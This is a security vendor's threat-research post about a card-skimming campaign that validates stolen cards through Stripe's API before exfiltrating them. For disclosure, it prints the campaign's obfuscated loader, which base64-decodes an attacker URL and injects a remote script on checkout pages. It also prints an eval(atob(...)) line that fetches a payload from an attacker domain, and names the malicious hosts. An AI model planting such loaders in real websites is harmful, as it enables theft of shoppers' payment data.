by Source Defense
A newly discovered payment card skimming campaign has emerged exhibiting a concerning level of sophistication and leveraging unique tactics that make detection highly challenging. The attack, identified by Source Defense researchers, employs an innovative technique that exploits Stripe’s deprecated API to verify card details before exfiltration – ensuring that only valid payment information is harvested while maintaining a seamless customer experience that evades detection.
Attack Overview: A Multi-Stage Compromise
The attack chain begins with a clever initial foothold, a compromised first party script that utilizes two known malicious domains that masquerade as legitimate resources:
- jqbs-get./store
- bsjq-online./store
These domains serve as the initial distribution points for the skimming payload, which specifically targets checkout pages through sophisticated path detection mechanisms.
Novel Features of the Campaign
What sets this attack apart is its selective validation process. Rather than blindly collecting all payment data, the attackers have implemented a verification system that:
- Intercepts legitimate payment form submissions
- Creates a perfect visual replica of the legitimate Stripe payment elements (i.e. it mimics the payment forms in the iFrame)
- Validates captured card data through Stripe’s API before exfiltration
- Maintains the original purchase flow to avoid detection
“This attack represents a concerning evolution in payment skimming techniques,” notes Source Defense’s research team. “By validating cards before exfiltration and ensuring the legitimate purchase completes, the attackers have created a nearly invisible theft mechanism.”
Technical Deep Dive: The Attack Mechanics
The campaign operates through a sophisticated three-stage process:
Stage 1: Initial Compromise
The attack begins with the compromised first party script running a sophisticated check for checkout pages, adapted to the locale of the website.
JavaScript
(function (i, s, o, g, r, a, m) {
i["Google" + "Analytics" + "Objects"] = r;
(a = s.createElement(g)), (m = s.getElementsByTagName(g)[0]);
if (i.location["href"].indexOf(i.atob(r)) > 0) {
a.async = 1;
a.src = "" + i.atob(o);
m.parentNode["insert" + "Before"](a, m);
r = 1;
}
})(
window,
document,
"Ly9qcWJzLWdldC5zdG9yZS93d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20vcGx1Z2lucy91YS9saW5raWQuanM=",
"script",
"Y" + "2" + "h" + "l" + "Y" + "2" + "t" + "v" + "d" + "X" + "Q" + "=",
"//www.google-analytics.com/analytics.js",
"ga"
);
Once found, it executes a request to one of these malicious urls:
- https://jqbs-get[.]store/www.google-analytics.com/plugins/ua/linkid.js
- https://bsjq-online[.]store/www.google-analytics.com/plugins/ua/linkid.js
This request returns a base64-encoded JavaScript that calls the malicious code that holds the attack code, one of these urls:
- https://jqbs-get[.]store/cdn/jquery-update.min.js?v=3.0.12
- https://bsjq-online[.]store/cdn/jquery-update.min.js?v=3.0.12
JavaScript
eval(atob("dmFyIGpxVVAgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtqcVVQLnNyYz0naHR0cHM6Ly9qcWJzLWdldC5zdG9yZS9jZG4vanF1ZXJ5LXVwZGF0ZS5taW4uanM/dj0zLjAuMTInO2RvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJ2hlYWQnKS5hcHBlbmRDaGlsZChqcVVQKQ=="));
Stage 2: Form Manipulation
Once triggered, the malware:
- Removes the legitimate Stripe payment elements
- Injects a visually identical but compromised payment elements
- Captures payment details through the fraudulent one
Original Stripe payment elements:
Fake payment elements:
Stage 3: Card Validation and Exfiltration
The most innovative aspect of this campaign is its use of Stripe’s API for validation:
- Captured card details are first sent to api.stripe.com/v1/sources
- Only validated cards are exfiltrated to isjustour./site – which is not yet identified as a malicious domain by leading blacklist providers.
- The malicious code clicks the submit option – this time, without initiating the validation with Stripe again – to continue the purchase flow so both the user won’t identify any suspicious activity or Stripe.
document
.querySelector('button[name="woocommerce_checkout_place_order"]')
.click();
Implications for E-commerce Security
This attack demonstrates several concerning trends in the evolution of payment card skimming:
- Sophisticated Validation: By leveraging legitimate payment APIs, attackers ensure only valid cards are stolen.
- Seamless Operation: Unlike the classic fake form attack that requires double-entry by the customer, this attack maintains normal purchase flows, making detection extremely difficult. Furthermore, even security researchers will have a hard time finding this attack because when entering fake payment details the malicious code doesn’t exfiltrate payment data.
- Dynamic Payload Delivery: The malicious script dynamically adjusts its behavior depending on whether Stripe or another payment processor is used. If Stripe is detected, it utilizes Stripe’s API for validation. Otherwise, it may fall back to other methods, such as regex-based card number validation.
Recommendations for Protection
Organizations operating e-commerce platforms should:
- Implement robust client-side security controls to prevent unauthorized script execution
- Monitor and validate all third-party script behavior, on the entire website
- Deploy real-time behavioral analysis to detect form manipulation attempts
- Consider implementing additional validation steps for payment API access
As we approach the March 2025 deadline for PCI DSS 4.0 compliance, particularly requirements 6.4.3 and 11.6.1, this attack serves as a stark reminder of why client-side security controls are now mandatory. It also demonstrates a false sense of security which many may find themselves believing in – that somehow the embedding of a PSP iFrame overcomes adversarial tradecraft.
The sophistication of this campaign – leveraging APIs and maintaining seamless customer experiences – demonstrates that traditional security measures are no longer sufficient to protect against modern payment card theft techniques.
Organizations must take proactive steps to secure their client-side environment and protect customer payment data from increasingly sophisticated threats. This includes implementing robust script monitoring and control mechanisms that can detect and prevent unauthorized form manipulation and script injection attempts in real-time.
For more information about protecting your organization against sophisticated client-side attacks, contact Source Defense for a comprehensive security assessment.
PCI DSS 4.0 makes client-side security a priority.
Source Defense delivers a solution for 6.4.3 and 11.6.1 without adding a burden to your security teams.
